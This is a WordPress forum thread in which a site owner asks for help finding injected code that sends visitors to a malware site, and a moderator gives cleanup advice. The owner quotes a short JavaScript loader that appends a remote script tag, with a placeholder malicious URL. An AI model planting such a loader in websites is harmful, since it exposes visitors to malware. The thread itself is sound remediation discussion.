Find a specific link inside code

  • Recently my computer got infected with a virus. I have now cleaned it, but as a result, my website has also been infected, and users are forced a popup (I have NO popups on my site).

    I have narrowed down the specific code:
    [removed]

    This^^ is the code that takes users to a known malware website! Problem is, I dont know where to find this line! I tried the header.php but its not there..

    I scanned my site with various security scanners online and none of them shows my site as infected.

    My site’s address is:gadgtecs.com

    thanks

Viewing 8 replies - 1 through 8 (of 8 total)
  • Moderator James Huff

    (@macmanx)

    Remain calm and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    Thread Starter hdaackda

    (@hdaackda)

    ^thanks a lot!

    Read the guide… I can solve my issue by removing just 1 line.. problem is, this guide also doesnt tell me how to find that line!

    Moderator James Huff

    (@macmanx)

    Follow the complete guide. Removing the line is just treating the symptom, you won’t find and plug the vector they used to add the line.

    It’s like taking aspirin because someone just cut off your arm. If you found the aspirin, it might hurt less, but it doesn’t actually fix the problem.

    Thread Starter hdaackda

    (@hdaackda)

    The vector was within my laptop (local system) sir..

    and since its not html, I think it was not generated by a php file (or maybe I am wrong?)

    I would like to first fix that line, then I can go backwords and double check… (e.g. if its from a plugin, then I know plugin is at fault)..

    I think finding <script type="text/javascript" src="link of malware here"> should not be difficult.. but… arrghhh

    Thread Starter hdaackda

    (@hdaackda)

    One solution in my mind is to download the WHOLE website, then use a text searcher (like notepad++) etc.. but that is tooo inefficient, esp if the site is big

    EDIT

    using the FIREBUG Addon… if I double click on that malicious <script> code… I get

    var oScript = document.createElement("script");
	oScript.type = "text/javascript";
 	oScript.src = "LINK OF mALICIOUS SITE HERE";
 	document.getElementsByTagName("head")[0].appendChild(oScript);
    Moderator James Huff

    (@macmanx)

    Stop opening the malicious code, that’s not safe. ??

    As for finding it, yes, you will have to search every file. There is no other way. WordPress is a dynamically generated platform, meaning that every file contributes to page generation.

    Thread Starter hdaackda

    (@hdaackda)

    ^ahhh ok

    thanks

    will use filezilla to try and figure it out…

    btw, any idea what XPath is (using firebug)… or whats the meaning of

    /html/head/script[19]

    Moderator James Huff

    (@macmanx)

    xPath just helps programs identify the location of a specific element on the page itself, not what file is producing it.

    What you have above is HTML document, <head> section, 19th <script> tag.

    https://en.wikipedia.org/wiki/XPath#Syntax_and_semantics_.28XPath_1.0.29

Viewing 8 replies - 1 through 8 (of 8 total)
  • The topic ‘Find a specific link inside code’ is closed to new replies.

Tags